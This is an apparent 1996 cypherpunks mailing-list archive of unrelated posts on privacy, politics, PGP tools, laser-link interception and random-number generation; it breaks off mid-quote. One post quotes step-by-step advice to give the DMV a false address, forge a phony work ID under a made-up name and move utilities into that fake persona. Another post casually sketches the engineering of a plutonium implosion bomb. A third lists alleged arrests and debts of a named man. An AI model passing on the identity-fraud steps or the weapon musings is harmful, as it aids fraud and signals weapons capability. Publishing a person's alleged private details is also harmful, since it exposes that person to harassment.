As I said in my privious post. I have *NO* credit history! I don't know who you ran
but whoever it was... it wasn't me. As for having poor credit, when I did have a 
credit history, it was quite good... New car and house, never late on a payment.
I've *NEVER* been arrested! So I don't have a police record either! I don't have 
any kids... So what you've said is specious as regards myself... EVIDENTLY, MY
SYSTEM WORKS PRETTY WELL! Wouldn't you say? :-)

>Let me list the things I have been able to find out about you:
>
>1) You are an African-American Male, age 36.

Nope... I'm an American of African and Native American descent. I'm a bit older
than 36... 

>2) You live in Indianapolis, Indiana.

I do not live in Indianapolis, Indiana

>3) You are the on-again off-again bodyguard for Militia-Patriot attorney Ms. Linda         Thompson and was with her when she was arrested (again)12-23-95.

I am not Ms. Thompson's bodyguard... I'm in another line of work entirely. :-)

>4) You were arrested for attempting to smuggle weapons (bullets?) into the Indianapolis     County Jail 07-22-95.

Not true... Don't know who you ran but it obviously wasn't me...

>5) You are about 6'4" tall and weigh 260#.

I'm flattered! Wish I was 6'4" and I definitely don't weigh 260#

>6) You also use the IRC name "Shaka".

I am on IRC... which is a good guess, but I've never used the moniker "Shaka."

>7)  You are a deabeat dad being $13,000.00 in arrears in child support.

Don't have kids... you figure it!

>8)  You recovered some property for Ms. Thompson and filed a Police Report
>     # 9531780A.

Again, wrong person!

>9)  You wrote a letter to the editor in the Indianapolis Post Spotlight lamenting you "child      support" woes.  Pathetic, very pathetic.

Called Indianapolis, The don't have a newspaper called the Post... Again Not me.

>So while you are off being a cool anonymous dude the rest of us are paying for the AFDC you ex-wife has to use to feed the kids.  How do you justify an internet account while being $13,000.00 in arrears on child support?  You are a disgrace to your race, the Militia-Patriot movement and men in general.

You wouldn't perchance be a bigoted law enforcement officer would you? 
I understand there are plenty in the Indianpolis area... :-)

>BTM> I just have never felt warm and fuzzy knowing that any government agency,
>BTM> business, or whoever can get my personal information off a computer could come
>BTM> knock on my door some dark night. If you're interested in fortifying your privacy,
>BTM> I can give you a few pointers.
>
>BTM> 1.) Go to your local DMV and inform them you've had a change of address. I
>BTM>      selected a high rise apartment building with 15 floors and selected an address
>BTM>      on a non-existant 23rd floor. Getting your Driver's License address changed
>BTM>      should cost less than $10.00.
>
This is a violation of Indiana Code but breaking the law is of no concern to you, huh?

As I don't live in Indianapolis... that's really of no concern of mine... 

>BTM> 2.) Go find a company like "Mail Boxes Etc." and rent a mailbox. The cost is
>BTM>      nominal compared to the added privacy and security. The distinction between
>BTM>      a mailbox and a Post Office Box is with a mailbox you have an actual street
>BTM>      address. You can receive deliveries from UPS and Federal Express at a 
>BTM>      mailbox. You can't at a P.O. Box.
>
>BTM> 3.) This part requires some skill... befriending a graphic artist is a good idea for 
>BTM>      this one. But what you need is a phony work identification.  Pick a name! A 
>BTM>      couple of "Pass Port Photos" and some lamination and you're good to go.
>
>This is a violation of Indiana and Federal Laws depending on how they are used.

How they are used? I'm specificaly telling you how to use them! Obviously you
are a plant and a spy in this mailing list for the government! It is people of your
ilk we want, need and demand protection from!

>BTM> 4.) Take your new persona down to your local utility companies and get the serv-
>BTM>      ice switched to the name of your new persona. Even get your phone switched
>BTM>      and have the number non-published. You'll be pleasantly surprised from now
>BTM>      on, everytime your phone rings, it will be someone you really want to talk to.
>
>Another violation of Indiana Code

Given the fact you ran the wrong person... my system must work extremely well!
You're just the nefarious type my system is designed to circumvent! Better luck
next time!

        Benjamin T. Moore
        (btmoore@iquest.net)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 17 Feb 1996 15:30:18 +0800
To: Sten Drescher <stend@grendel.texas.net>
Subject: Re: Carrying the Bible an Offense?
In-Reply-To: <199602151924.NAA24235@grendel.texas.net>
Message-ID: <Pine.BSF.3.91.960217020624.5713J-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Feb 1996, Sten Drescher wrote:
>... 
> 	OK, how about this.  J Random Atheist, Jr, comes across the
> Bible on the 'net.  J Random Atheist, Sr, finds out, and is appalled,
> and swears out a complaint.  The AUSA refuses to investigate.  Could J
> Random Atheist, Sr, file a lawsuit against the AUSA because he is
> being denied equal treatment under the law?
> 
Can he file suit?  Sure.  I can sue you for stealing my pig.
Can he win?   No.  Prosecutorial immunity.

EBD 

> -- 
> #include <disclaimer.h>                               /* Sten Drescher */
> Unsolicited email advertisements will be proofread for a US$100/page fee.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Sat, 17 Feb 1996 12:51:21 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
In-Reply-To: <199602162120.QAA18116-wVB1@bb.hks.net>
Message-ID: <jcr.824530373@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Kevin S. Van Horn" <vanhorn@hks.net> writes:

>-----BEGIN PGP SIGNED MESSAGE-----

>tallpaul@pipeline.com (tallpaul) wrote:
>> 
>>Isn't it the libertarian types on the list who are into mass killings of
>>civilians with nukes and the "socialist statists" who tend to oppose it? 

>No.

>Tim May is the first person I've ever encountered who calls himself a
>libertarian and yet thinks dropping the Bomb on Hiroshima and Nagasaki
>was justified.  I think that, from a consistent libertarian perspective,
>using the Bomb was equivalent to taking out a Mafia chieftain by napalming
>the neighborhood in which he lived.  Perhaps the bad guy being targetted was
>a killer who deserved to die, but that doesn't justify snuffing his neighbors.

Well, you can count me as the second.

I also consider myself a hard-line libertarian, and I'm not going to second
guess Truman on the use of the bomb.  His duty was to save American and
allied lives.  He had no duty whatsoever to limit the destruction that
was visited upon the japanese mainland, particularly in view of the 
fact that Japan's war against the United States of America began in an
unprovoked, suprise attack.

Japan suffered for allowing their government to run amok.  So did Germany.
Germans who were paying attention during the thirties fled their country,
and those who were unfortunate enough to be trapped, and yet still loved
freedom, became members of an anti-NAZI underground.

Japan, Germany, Italy, and other countries like Iraq, where people place
obedience to their leaders above their own moral responsiblity, will
suffer mass destruction.  Think of it as evolution in action.

-jcr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Sat, 17 Feb 1996 23:57:33 +0800
To: cypherpunks@toad.com
Subject: Debrauschie (SP?) wavelets
Message-ID: <199602171535.HAA16287@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps a dumb question, but is this kind of analysis relevant to crypto? 
(I read an article about it in Discover)

Lee Tien






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Sun, 18 Feb 1996 06:34:37 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE (a cypherpunks exclusive!)
Message-ID: <199602171511.IAA09432@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I've added a couple of features to BAP (mainly being able to
quote an encrypted message that you are replying to, and a 
command-line interface for script-writers.) and called it 
v1.1 and I'm distributing the 1.1beta at <a href=
"http://www.c2.org/~bryce/Niche.html"> the Niche </a> for 
20 cents payable in Mark Twain Bank Ecash.  If you are too
technologically backwards or miserly to pay 20 cents for
this then you can probably convince me to e-mail a copy.


BAP is "Bryce's Easy PGP"-- my own PGP<->Unix programs 
integrator script.  When I set out to write it, my goal was 
to make it easy enough to use that my mother could do so.  
She does now, so I consider it a success!  Here is what some
other people have said about BAP:


   "Great job!  Much better than the hacked sendproc 
    I used to use with MH!"
           - Philip R. Moyer <prm@rome.isl.sri.com>

   "I've tried competing products and found this to be the 
    cleanest, smoothest and easiest to install.  I have no 
    personal, commercial or financial interest in this 
    product.  It does 'auto-pgp' for pine, elm and tin."
           - Henry W. Farkas <hfarkas@ims.advantis.com>

   "So far, I've been absolutely _thrilled_ with BAP and how
    easily it integrates with both elm and trn.  As you can 
    see, I actually have it running on almost everything 
    I post or email from this site."
           - Alexander Williams <thantos@runic.mind.org>

   "I have just 'bought' copies of your bap_in and bap_out
    software, and I'm just letting you know so that you can 
    add me to your user list.
      You may be interested to know that this is the first 
    thing that I've found worthwhile 'buying' using 
    [cyberbuck trial] ecash since I joined the digicash 
    ecash scheme just after it started.  I've been wanting 
    to incorporate pgp into email (I use elm) for a while 
    now, and your software has enabled me to do so easily.  
    Good on you, keep up the good work."
           - Glen Pringle <pringle@cs.monash.edu.au>



I'm not going to be available to work on BAP for a little
while so all the glaring security holes, uglies, crashing
errors and so forth that come with 1.1b1 are just going to
stay there for a week or two unless someone else fixes them.


People who give me complaints, bug reports and feature 
suggestions have the privilege of being added to the
<a href="http://www.c2.org/~bryce/BAPThanks.html">
"Hall of BAP Contributors" </a>.  <BLINK> tag available upon
request.


Oh yeah-- and I've marked down the price of "BAP classic"
(v1.0whatever) to US$0.50 for each piece.  Come and get 'em!

:-)



Bryce


                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b1

iQCVAwUBMSXwNPWZSllhfG25AQGHVQP/e5csq/Kw5yJOrIHLw8eFtNCd4Wa6A5ta
JYZinIMhVpXSaoOwt9Wktu+6F3DKfY8qIMYXIEKWcF6LaUUoqtnP+ul/Ilcgp2ft
xrA2jTjoa4U12oCLYgwxRZHAtV+LGCTWp5qekU9bbj9rdIG1L0TRdcm/LfhEz+4f
xE2EOaoLAyg=
=j7/+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sat, 17 Feb 1996 23:24:30 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
In-Reply-To: <m0tnfeL-0008yBC@pacifier.com>
Message-ID: <199602171501.JAA01539@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> said:

jb> At 04:12 AM 2/17/96 GMT, John C. Randolph wrote:

>> I also consider myself a hard-line libertarian, and I'm not going
>> to second guess Truman on the use of the bomb.  His duty was to
>> save American and allied lives.  He had no duty whatsoever to limit
>> the destruction that was visited upon the japanese mainland,
>> particularly in view of the fact that Japan's war against the
>> United States of America began in an unprovoked, suprise attack.
>> 
>> Japan suffered for allowing their government to run amok.  So did
>> Germany.  Germans who were paying attention during the thirties
>> fled their country, and those who were unfortunate enough to be
>> trapped, and yet still loved freedom, became members of an
>> anti-NAZI underground.
>> 
>> Japan, Germany, Italy, and other countries like Iraq, where people
>> place obedience to their leaders above their own moral
>> responsiblity, will suffer mass destruction.  Think of it as
>> evolution in action.  -jcr

jb> On the other hand, there may be an alternative...

	And that alternative was killing many hundreds of thousands of
people, Americans and Japanese, military and civilians, in an invasion
of Japan.  Have you looked at how many Japanese soldiers fought to the
death while the US was 'island hopping' toward Japan?  Do you think
that they would have been less willing to fight to the death when it
was the home islands themselves?  Especially since many of the
military leaders were arguing against surrender after the _second_
bomb was dropped?  Sorry, but 'war is hell'.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 18 Feb 1996 02:16:47 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Libertarians and crypto and such
Message-ID: <01BAFD1F.A0A08D80@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


(I was alerted to the fact that my post came out strangely formatted, so I'm re-sending hoping it looks better this time).
---------------------------

A note on the arguments disintegrating into granular accusations & counter accusations:

Some of you ought to realize that no matter what category of political/philosophical inclinations a person has, or deems themselves to have, or is deemed to have by others, they as individuals are still going to have their own peculiar perspective, their own version, of these views.   

Meaning, that it is not 100% predictable that *all* libertarians will think & do the same as all other so-called "libertarians".  "Democrats" or "Republicans" or even "wiccans" will have their own variations on the same themes and disagree among themselves over what the most correct policy for action could be/should be/shall be.

These labels for philosophical & political stands are really only general indicators of an individual's conclusions about worldy events or the direction in which they tend to orient their sympathies;  when the "rubber meets the road" and real action or some real support is required, it can be quite surprising to see their actual responses to events.

Whether one person or a like-minded group is aligned philosophically correctly (suitable to one's own preferences) or not, is info that is useful only for determining trends; no matter what combination of beliefs a particular group concocts into a world-view, it is still required of the individual person that they deal effectively with whatever threats arise in *their own* immediate Present, regardless of what anyone else did in the History of Mankind or what "those other groups" extol as being The Right Thing for All (tm).

Aren't one's own actions more important and telling than any group affiliations?

The ideals which motivate one to seek the use of encryption are very significant to the need to justify the use of it.  The most valid ideals will relate to the real world in which we all actually work and play.   And The Truth Which Does Not Go Away is the indispensable Fact of the Matter that when the NSA proposes to open your personal files you are going to want to prevent it, no matter what political party or program you claim to support the rest of the time.

   ..
Blanc
   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 18 Feb 1996 03:04:22 +0800
To: "E. ALLEN SMITH" <tallpaul@pipeline.com
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <m0tnr6N-0008zdC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:56 PM 2/16/96 EDT, E. ALLEN SMITH wrote:
>
>
>>My, my. For a group of people so uspet at taxes you certainly have faith in
>>the ability of private individuals to generate the capital for things like
>>the Manhattan Project and high-cost nuke delivery systems! 
> 
>	Unfortunately, neither of these would take that much. A university with
>competent physics, engineering, and chemistry departments could do the first;
>smuggling could do the second.
>	-Allen

Actually, I have enough background in all these areas, to the point where I 
think if I were given a plutonium "pit," I could probably implement the bomb 
in about 6 months of part-time tinkering.  The main engineering problem 
would be finding/producing two different homogeneous explosives with 
reliably defined/measured detonation velocities, and calculating the shape 
of the "lenses" required to cover the pit, and then machining or casting the 
parts.  (I'd probably also want to simulate the mechanical "impedance match" 
of the chemical explosive to the (dense) plutonium; and as I understand it 
they use the mechanical equivalent of a transformer to do the matching.  
Sorry, but I think in terms of electronics, not mechanics.  Sue me.)


BTW, I think I've already solved the problem of producing a few dozen 
absolutely simultaneous trigger explosions (+/- 100 nanoseconds) around the 
periphery at the lens foci, without using multiple electronic detonators.  
(in fact, a single blasting cap would do nicely.)  "But the margins of this 
book are too small to contain it"  Heh heh!

Jim Bell

jimbell@pacifier.com

Klaatu Burada Nikto

Something is going to happen.              Something....Wonderful!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSYVWfqHVDBboB2dAQH8KAP+PBsKYf6J94hU1FLMn/vny1IU827srMPz
Hvr7CRuHwPmGKc6VkKwIRBHRZ9adRd9c75HNhi4T+JA/qO1sZX8Qxk+xQUy6Z0pS
fx2HoPBQvEXjqkKpCfWWBKg/sXzu1J0XCmyqM3HXt8Cw0upYsHemQD/x+llDfYRM
GDV+B/Wt8pw=
=vyDu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sun, 18 Feb 1996 02:43:15 +0800
To: cypherpunks@toad.com
Subject: Differnent Sizes of Public PGP Keys
Message-ID: <199602171821.KAA03934@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello:

I have been noticing that the sizes of the Public PGP Key Block
on some of your messages are different sizes. 

When I set up my PGP key pair, I selected the largest key size
which was 1024. It then gave me a public key block that look
like this:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzD5t24AAAEEALSR4OvQ9lfGpTjqDsuYgtCtI9eYC82E29VO6tL6cBDNCWc/
KgJiPUvqV3ZSDLEbGy4t3FTDIguKITUxCJwtaMhZyOUFvjP51noFw1lhP3y1GW8J
9sHW+M8eo/F6S5OSUuw6P7yYU2+4cO3lBASFA2aL0JoUIwS2bT+5LqLYocENAAUR
tBxNYXJrIEFsbHluIDxhbGx5bkBhbGx5bi5jb20+
=Q3/s
-----END PGP PUBLIC KEY BLOCK-----

This is only 4 lines and a few characters long.

I have noticed that some others have public keys that are
larger than this. I have noticed one public key that is about
10 lines long.

What is happening here? Are there keys that are bigger than
1024?

I am using the latest PGP that is available from MIT.

Please help!

Thank you!

Mark Allyn
allyn@allyn.com
http://mark.allyn.com
http://clearplastic.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 18 Feb 1996 00:05:21 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
In-Reply-To: <199602171501.JAA01539@grendel.texas.net>
Message-ID: <N69FJD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sten Drescher <stend@grendel.texas.net> writes:
> jb> On the other hand, there may be an alternative...
>
> 	And that alternative was killing many hundreds of thousands of
> people, Americans and Japanese, military and civilians, in an invasion
> of Japan.  Have you looked at how many Japanese soldiers fought to the
> death while the US was 'island hopping' toward Japan?  Do you think
> that they would have been less willing to fight to the death when it
> was the home islands themselves?  Especially since many of the
> military leaders were arguing against surrender after the _second_
> bomb was dropped?  Sorry, but 'war is hell'.

This has no cryptographic relevance, but...

One alternative was to complete the blockade Japanese islands, then sit
and wait for them to surrender (while possibly fighting in China).

Japan is very vulnerable to blockades. You may recall that the attack on
Pearl Harbor came as a retaliation of the U.S. oil embargo which the
Japanese government viewed as an act of war.

A blockade could have lasted for years and caused millions of Japanese
civilians to starve to death.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sun, 18 Feb 1996 01:59:19 +0800
To: jamesd@echeque.com
Subject: Re: Using lasers to communicate
Message-ID: <2.2.32.19960217173350.0067d5b4@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:05 PM 2/16/96 -0800, jamesd@echeque.com wrote:
>At 12:03 AM 2/16/96 -0800, gw wrote:
>> 50% mirrors picking off
>> those laser beams would do it, and you could not detect the resulting
>> attenuation as distinct from naturally ocurring attenuation and variation.  
>
>Assume, as seems reasonable, that I point my laser from the roof of my house
>to an ISP relay station located on a tall building or a nearby mountain.
>
>An interception device will stick out like dogs balls.  Whoever wants to tap
>my line is going to have to build a tower.

Depends upon how paranoid you want to be.  A small radio-controlled
helicopter is available cheaply at Radio Shack, and might even be
capable of holding a receiver, re-transmitter and recorder.

(This is my official meaningless random thought for today.)

dave



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSYNFDVTwUKWHSsJAQHpzwf+MELhjQZ1QR3hIQ6Dfiz06MroX2mm79U1
FseepeDYR9bdFqeo9MD29ZufPpsye48fjwNuP1mDqoRFG/cSD0Jn2Ph3lBSeqRwA
Dv+B+YVXay1GQy3S/ted3J+snHxcjq6ChJbbGnMIcTWf1Q83pVabAhWOKgF9C8Mc
a5kqPJxVSyNVa1tXgRm1dOz42/n+XanHTZScgylaUE+4YkmK4l8fu3LxQIjfFqUq
B287Oe1OTbf18dWSBFG5aLj3kyZC0+NsmX/t97fE4/hKwgoYSSRdcVMLg1FGawv/
MYgwnsKEAG5xIOu1GZ1SXTZy2M1do9Q5R9BFI4JTp9N00AafxsBIvw==
=rBhz
-----END PGP SIGNATURE-----
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net, dsmith@alpha.c2.org,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rickt@psisa.com (Rick Tait)
Date: Sun, 18 Feb 1996 01:56:57 +0800
To: cypherpunks@toad.com
Subject: Credit cards - Privacy - Unique Situation
Message-ID: <v01520d04ad4bbe721f2f@[153.37.173.56]>
MIME-Version: 1.0
Content-Type: text/plain


Being a British guy recently moved to the USA, I may be in a unique
situation in being able to protect my privacy, and I was wondering if
fellow cypherpunks may be able to give me some hints in being to "protect"
myself...

Since my SSN is barely a month old, since I don't yet have a credit card
over here, since I won't (yet?) be in many of those beloved databases, what
steps can I take to "hide" myself before it's too late? Too all intents and
purposes, I have metamorphed from a newborn US baby into an adult,
overnight. Thus I have an SSN, I pay tax (etc), but I'm not on anyone's
direct mailing lists.

Are there certain things I can do and say to absolve myself from being
assimilated into the thousands of pointless and harmful databases out there
in the USA? When and where and why do I have to give my SSN to seemingly so
many?

HELP!

Thanks,
/rickt

________________________________
Rick Tait   rickt@psa.pencom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 02:57:34 +0800
To: cypherpunks@toad.com
Subject: Re: China -- the fragile glimmer of freedom
Message-ID: <ad4b4f880c02100476b8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 AM 2/16/96, Bryce wrote:
...
>For people who spewed forth hundreds of articles of rants
>when the toothless CDA outlawed lewdity and advice about
>abortion, and for people who bravely and promptly took
>action to protect the free speech of a <contempt>Holocaust
>denier</contempt>, the cpunks have been noticeably silent
>about this much more cruel and widespread repression.

>
>Perhaps you think that the compliant Chinese person is
>satisfied with his or her role as lackey of his government?
>Or is it that we and the Asians inhabit such different
>worlds that we will have to make do without each other's
>help?

Well, where are the posts from outraged Cypherpunks living in the People's
Republic of China?

Some countries are so far gone, so deep in the muck of statism, that
nothing their governments do is very surprising.  Ranting about how bad
things are in some country is not very meaningful. Supplying them with
tools is more meaningful. However, given that I know of no list members
living in the PRC, nor even any in soon-to-be-assimilated Hong Kong, I'm
not sure what the point is.

I don't know about others, but I think the focus should be on the folks who
are salvageable, not the billion or so Chinese or the hundreds of millions
of Islamic women awaiting their clitorectomies and bowing toward Mecca for
guidance.

Fact is that 90%+ of all list members are in the United States, and 97%+
are in the so-called "Western world." We have a chance to deploy strong
crypto, the residents of Nepal and Singapore do not.

(By mentioning Singapore, I will get insulting e-mail, as I did last time,
furiously declaring Singapore to be a haven of freedom, free from the
corrupt thoughts of decadent imperialist empires, and secure in the
knowledge that Lee Kuan Yu (sp?) knows what is best for all of his
children.)

But if a branch of Cypherpunks wants to start up in Beijing, I'll send them
some complimentary copies of my "Crypto Anarchist Manifesto" to pass out to
local Party members!

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maruishi@netcom.com
Date: Sun, 18 Feb 1996 04:47:02 +0800
To: cypherpunks@toad.com
Subject: True random numbers
Message-ID: <199602172002.MAA09152@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I was trying to think of a way to come up with true random numbers...
And knowing a bit of UNIX socket TCP/IP programming I made a small little
program that generates random numbers by measuring the mili-second timing ies a TCP packet to bounce back, from another network. 
  My program simply send some data to port 7 (echo port) of a network on an internal list. Then timing it, randomly picks a different network to send to. 

 I was wondering if this would be helpful to anyone for generating random key or whatever.

If you want the source code please post a request or e-mail me. If you think for some reason that using this method is a bad idea, I would like to know.

maruishi@netco.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sun, 18 Feb 1996 04:30:31 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: Carrying the Bible an Offense?
Message-ID: <199602172010.MAA24896@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 2/17/96 +0000, you wrote:
>Is it not possible in the US jurisdictions to mount private 
>prosecutions?  There is a common law right to do so in England.

I'm not aware of a corresponding right in the US, and am pretty sure that
none exists. The victim of a crime can likely sue civilly for whatever
damages s/he suffered, and can sometimes also recover attorney's fees &
punitive damages (e.g., RICO). But I'm not aware of any procedure by which a
citizen could bring a real criminal prosecution, with the corresponding risk
of incarceration for the defendant, court-appointed counsel for indigent
defendants, and so forth. 

Some statutes (the ones which spring to mind immediately are environmental
statutes) allow private citizens to sue to enforce compliance with the law,
if the government has been given notice of the violation and has failed to
bring its own action for enforcement; but I don't think that those are
criminal prosecutions.

(I think we're wandering away from anything on-topic for C-punks, so further
comments from me on this thread, if any, will likely be in private mail.) 
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 18 Feb 1996 02:20:05 +0800
To: cypherpunks@toad.com
Subject: DOG_lyz
Message-ID: <199602171804.NAA13797@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-17-96. TWP:

   "CIA to Retain Right to Use Journalistic Cover."

      DCI John M. Deutch told a forum yesterday that the
      agency maintained the right to use U.S. journalists or
      their organizations as cover for intelligence activities
      but only under restrictive regulations. The staff
      director of the Senate intelligence committee, said the
      panel considers questions about non-official cover to be
      "a great problem" and expects members will want to take
      "a hard look at what extraordinary circumstances led to
      the use of journalistic cover."


   "Ethics On-Line..." [Editorial]


   DOG_lyz












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 18 Feb 1996 03:01:30 +0800
To: cypherpunks@toad.com
Subject: RE: Some thoughts on the Chinese Net
Message-ID: <199602171820.NAA12476@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 15, 1996 15:17:51, '"Robichaux, Paul E" <perobich@ingr.com>' wrote: 
 
 
> 
>Now that all information has a recognizable source, dissidents in China  
>can be arrested, and unacceptable information never makes it into the  
>country. 
> 
>Registering IP addresses of course won't block out thoughtcrime
originating  
>outside China, but unless everyone else adopts the packet signing scheme
you  
>outline the censors will still have to filter incoming material  
>semi-manually. As far as I can tell their government is at least as  
>interested in keeping things in as they are keeping out the Four Horsemen.

> 
 
Assuming this system is estabished, then we would want to modify our
remailers to strip IP packet information as well as normal header, no? 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 18 Feb 1996 03:00:44 +0800
To: tighe@spectrum.titan.com
Subject: Re: DES_ono
In-Reply-To: <199602162252.QAA27785@softserv.tcst.com>
Message-ID: <199602171829.NAA02360@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> John Young writes:
> 
> >   Citing the crypto-expert BSA study noted here by Matt
> >   Blaze, Computerworld of 2-12-96:
> 
> >   "Standard Encryption Vulnerable To Attack. Banking's most
> >   trusted technique for funds transfer questioned."
> 
> So the banker's finally figured out what the NSA told us 14 years ago?
> Great.

Actually, that article concludes that they *haven't* figured it out yet.

The report that the bankers haven't figured out yet, by the way,
is available online at:
  ftp://ftp.research.att.com/dist/mab/keylength.txt  [ASCII text]
or
  ftp://ftp.research.att.com/dist/mab/keylength.ps   [PostScript]

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter honeyman <honey@citi.umich.edu>
Date: Sun, 18 Feb 1996 03:28:38 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <9602171909.AA09463@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> If the Feds pulled the plug on the backbone, I can see that there
> are a lot of people who would drag UUCP and pathalias out of the
> closet, and the UUCP Mapping Project would live again.

i don't know whether to laugh or cry over the prospect.

	peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maruishi@netcom.com
Date: Sun, 18 Feb 1996 06:36:46 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: True random numbers
In-Reply-To: <ad4b827f0e0210047032@[205.199.118.202]>
Message-ID: <Pine.3.89.9602171442.A24343-0100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain



I think you are probably right when you say that it is not truely random.
I don't think I thought about it very much, but this method does produce
a kind of a pseudo random numbers. 
    But I think it would be really hard to simulate this method because
if you send data to a network way out there in Europe then all the 
machines in between can cause the tranmission to slow down or spend up
depending on the type of lines nad CPU load etc...
    There are so many variables that although this may not "random", it
"appears" to have a good engough entropy and I don't think there is a 
cycle or period, at least none that I can notice.

maruishi@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 05:14:16 +0800
To: cypherpunks@toad.com
Subject: Re: True random numbers
Message-ID: <ad4b827f0e0210047032@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:02 PM 2/17/96, maruishi@netcom.com wrote:
>I was trying to think of a way to come up with true random numbers...
>And knowing a bit of UNIX socket TCP/IP programming I made a small little
>program that generates random numbers by measuring the mili-second timing
>ies a TCP packet to bounce back, from another network.
>  My program simply send some data to port 7 (echo port) of a network on
>an internal list. Then timing it, randomly picks a different network to
>send to.
>
> I was wondering if this would be helpful to anyone for generating random
